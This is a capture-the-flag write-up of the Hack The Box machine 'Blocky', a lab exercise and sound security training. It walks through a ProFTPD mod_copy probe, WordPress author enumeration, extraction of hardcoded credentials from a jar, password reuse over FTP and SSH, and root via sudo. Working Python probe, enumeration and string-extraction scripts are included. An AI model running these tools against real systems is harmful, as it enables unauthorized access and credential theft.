Blocky

Posted on Jul 16, 2021
Nmap scan report for 10.10.10.37
Host is up (0.12s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos

Scanning all ports additionally shows a Minecraft server on 25565/tcp:

PORT      STATE  SERVICE
21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http
8192/tcp  closed sophos
25565/tcp open   minecraft

FTP

Anonymous login doesn't work:

└─$ ftp 10.10.10.37
Connected to 10.10.10.37.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]
Name (10.10.10.37:bob): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Searchsploit shows two candidate RCE exploits, both for the ProFTPD 1.3.5 mod_copy bug (CVE-2015-3306), in which the SITE CPFR/CPTO copy commands could be issued without authenticating:

[..]
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                              | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                    | linux/remote/36803.py
[..]

A first run of the Metasploit module fails:

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 10.10.16.65:9001 
[*] 10.10.10.37:80 - 10.10.10.37:21 - Connected to FTP server
[*] 10.10.10.37:80 - 10.10.10.37:21 - Sending copy commands to FTP server
[-] 10.10.10.37:80 - Exploit aborted due to failure: unknown: 10.10.10.37:21 - Failure copying from /proc/self/cmdline
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > 

Looking at the packets shows why: the server answers the unauthenticated SITE CPFR with a 530, so this build of ProFTPD demands a USER/PASS login before it will accept SITE commands. That is exactly the pre-auth behaviour the mod_copy exploit depends on, so FTP is a dead end until we have credentials.

220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]

SITE CPFR /proc/self/cmdline

530 Please login with USER and PASS
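The same check the Metasploit module performs, reduced to the raw FTP exchange, as an added example that is not part of the original writeup: it sends one SITE CPFR before logging in and classifies the reply. A 350 means mod_copy honours the copy without authentication (the CVE-2015-3306 condition), a 530 like Blocky's means a login is required first, and anything else means the SITE command is not understood. The probe path /proc/self/cmdline is the one the module used above; the transcript helper and its sample replies are constructed so the logic runs offline.

```python
"""ProFTPD mod_copy pre-auth probe (added example, not from the original writeup).
The protocol logic is driven over text streams so a constructed transcript can
exercise it without a network; check_host() wires it to a real socket."""
import io
import socket
from typing import IO, List, Tuple


def read_reply(rfile: IO[str]) -> Tuple[int, str]:
    """Read one FTP reply, including multi-line replies ('NNN-...' up to 'NNN ')."""
    first = rfile.readline()
    if not first:
        raise EOFError("connection closed")
    code = int(first[:3])
    text = first
    if first[3:4] == "-":
        while True:
            line = rfile.readline()
            text += line
            if not line or (line[:3] == str(code) and line[3:4] == " "):
                break
    return code, text.strip()


def modcopy_preauth(rfile: IO[str], wfile: IO[str],
                    probe: str = "/proc/self/cmdline") -> str:
    """Return 'vulnerable', 'auth-required' or 'unsupported' from the first SITE CPFR reply."""
    code, banner = read_reply(rfile)
    if code != 220:
        raise RuntimeError(f"unexpected banner: {banner}")
    wfile.write(f"SITE CPFR {probe}\r\n")
    wfile.flush()
    code, _ = read_reply(rfile)
    if code == 350:        # "File or directory exists, ready for destination name": copy accepted pre-auth
        return "vulnerable"
    if code == 530:        # "Please login with USER and PASS": SITE commands gated behind login
        return "auth-required"
    return "unsupported"   # e.g. 500: mod_copy not loaded at all


def run_transcript(server_lines: List[str]) -> Tuple[str, str]:
    """Drive modcopy_preauth against a constructed server transcript; returns (verdict, bytes sent)."""
    rfile = io.StringIO("".join(line + "\n" for line in server_lines))
    wfile = io.StringIO()
    return modcopy_preauth(rfile, wfile), wfile.getvalue()


def check_host(host: str, port: int = 21, timeout: float = 10.0) -> str:
    """Run the probe against a live server (not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        rfile = s.makefile("r", encoding="latin-1")
        wfile = s.makefile("w", encoding="latin-1", newline="")
        try:
            return modcopy_preauth(rfile, wfile)
        finally:
            wfile.write("QUIT\r\n")
            wfile.flush()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(check_host(sys.argv[1]))
    else:
        # Constructed transcript mirroring what Blocky answered above
        verdict, sent = run_transcript([
            "220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]",
            "530 Please login with USER and PASS",
        ])
        print(verdict, repr(sent))
```

Only the reply code is trusted; the human-readable text after it varies between builds and is not used for the decision.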

Port 80

We are greeted by a standard WordPress site (nmap already fingerprinted it as WordPress 4.8).

[screenshot: 20210412123349.png]

We can enumerate users through the author archive: requesting http://10.10.10.37/index.php/?author=1 redirects to that author's archive page, which exposes the username without any authentication.

This gives us posts made by Notch. Incrementing the author ID by 1 doesn't yield any further users.

[screenshot: 20210412123604.png]
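The author-ID walk above, scripted, as an added example that is not part of the original writeup: WordPress answers /?author=N with a 301 to /author/<username>/ when the ID exists, so the Location header alone leaks the username. The fetcher is injectable so the parsing can be exercised offline; the stub response used in the test is constructed, and the base URL is only a default.

```python
"""WordPress author-ID enumeration via ?author=N (added example, not from the original writeup).
The default fetcher uses urllib and deliberately does NOT follow redirects,
because the username lives in the Location header of the 301."""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

# Author slug in a Location such as http://10.10.10.37/author/notch/ or /author/notch
AUTHOR_RE = re.compile(r"/author/([^/?#]+)/?")

Fetcher = Callable[[str], Tuple[int, Dict[str, str]]]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses instead of following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url: str) -> Tuple[int, Dict[str, str]]:
    """GET url and return (status, lower-cased headers); redirects are not followed."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}
    except urllib.error.HTTPError as e:   # with _NoRedirect, 3xx arrives here too
        return e.code, {k.lower(): v for k, v in e.headers.items()}


def author_from_response(status: int, headers: Dict[str, str]) -> Optional[str]:
    """Username from a ?author=N response, or None when the ID does not exist."""
    if status not in (301, 302):
        return None
    m = AUTHOR_RE.search(headers.get("location", ""))
    return m.group(1) if m else None


def enumerate_authors(base_url: str, max_id: int = 10,
                      fetch: Fetcher = http_fetch) -> Dict[int, str]:
    """Walk author IDs 1..max_id and map each existing ID to its username."""
    found: Dict[int, str] = {}
    for author_id in range(1, max_id + 1):
        status, headers = fetch(f"{base_url.rstrip('/')}/index.php/?author={author_id}")
        name = author_from_response(status, headers)
        if name:
            found[author_id] = name
    return found


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.10.37"  # assumed default
    for i, name in enumerate_authors(target).items():
        print(f"author id {i}: {name}")
```

Note that a site may block the redirect (some hardening plugins return 404 for ?author=N); in that case the function simply reports nothing rather than misreading a 200 page.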

From the gobuster run, we visit http://10.10.10.37/plugins/, where two jar files are available for download.

[screenshot: 20210412123656.png]

We can decompile the jar files with JD-GUI from the Java Decompiler project.

We begin by examining BlockyCore.jar with jd-gui.

└─$ java -jar jd-gui-1.6.6.jar                                           
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

[screenshot: 20210412123839.png]

From the look of it, the BlockyCore class has SQL credentials hardcoded in it. Anything compiled into a jar is this easy to recover, and a database password like this is worth trying against every other login on the host.
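Hardcoded secrets like these sit in the class constant pool as CONSTANT_String entries, so they can be pulled out of a jar without a GUI decompiler. The following is an added example, not code from the original writeup: it parses the constant pool of every .class in a jar and lists the string literals (not the Utf8 names and descriptors, which are mostly noise). The sample jar it builds is constructed in memory, and the literals in it are placeholders, not Blocky's actual values.

```python
"""List string literals from a jar's .class files by parsing the constant pool
(added example, not from the original writeup)."""
import io
import struct
import zipfile
from typing import Dict, List

# Payload size after the 1-byte tag for fixed-size constant pool entries.
# Tag 1 (Utf8) is variable-length; tags 5/6 (Long/Double) also take two pool slots.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def class_string_literals(data: bytes) -> List[str]:
    """Return every CONSTANT_String literal in one .class file, in pool order."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    count, = struct.unpack_from(">H", data, 8)   # constant_pool_count = entries + 1
    pos = 10
    utf8: Dict[int, str] = {}   # pool index -> Utf8 text
    string_refs: List[int] = [] # Utf8 indexes that String entries point at
    idx = 1
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            length, = struct.unpack_from(">H", data, pos)
            pos += 2
            # "Modified UTF-8" differs from UTF-8 only for NUL and supplementary chars
            utf8[idx] = data[pos:pos + length].decode("utf-8", errors="replace")
            pos += length
        elif tag == 8:
            ref, = struct.unpack_from(">H", data, pos)
            string_refs.append(ref)
            pos += 2
        elif tag in _FIXED:
            pos += _FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        idx += 2 if tag in (5, 6) else 1
    # String entries may reference Utf8 entries that appear later, so resolve at the end
    return [utf8[r] for r in string_refs if r in utf8]


def jar_string_literals(jar: zipfile.ZipFile) -> Dict[str, List[str]]:
    """Map each .class entry of an open jar to its string literals."""
    return {name: class_string_literals(jar.read(name))
            for name in jar.namelist() if name.endswith(".class")}


def _build_sample_class(literals: List[str]) -> bytes:
    """Constructed class-file prefix: header plus a constant pool holding the literals.
    Only the pool is parsed above, so the rest of the class body is omitted."""
    pool = b"\x05" + struct.pack(">q", 42)   # a Long at index 1 (slots 1 and 2) to exercise slot handling
    entries = 2
    for s in literals:
        raw = s.encode("utf-8")
        pool += b"\x01" + struct.pack(">H", len(raw)) + raw   # Utf8 at index entries+1
        pool += b"\x08" + struct.pack(">H", entries + 1)       # String -> that Utf8
        entries += 2
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, 52)  # Java 8 class version
    return header + struct.pack(">H", entries + 1) + pool


def build_sample_jar() -> zipfile.ZipFile:
    """Constructed in-memory jar with one class; the literals are placeholders, not real creds."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("example/Core.class",
                    _build_sample_class(["localhost", "dbuser_example", "dbpass_example"]))
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    buf.seek(0)
    return zipfile.ZipFile(buf)


if __name__ == "__main__":
    import sys
    jar = zipfile.ZipFile(sys.argv[1]) if len(sys.argv) > 1 else build_sample_jar()
    for cls, lits in jar_string_literals(jar).items():
        for lit in lits:
            print(f"{cls}: {lit!r}")
```

Run it against BlockyCore.jar to get the same host/user/password strings the decompile shows, ordered as they appear in the pool; for anything more than triage (which field each string is assigned to), jd-gui is still the right tool.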

We try this password with the username notch (the WordPress author we enumerated) on FTP:

Connected to 10.10.10.37.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]
Name (10.10.10.37:bob): notch
331 Password required for notch
Password:
230 User notch logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

We have a set of valid credentials, and the directory listing looks like the home directory of notch:

[screenshot: 20210412124105.png]

The same credentials work over SSH as well, giving us a shell as notch and the user flag.

Running sudo -l shows that notch may run any command as root:

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo bash -p
root@Blocky:~# 

ROOTED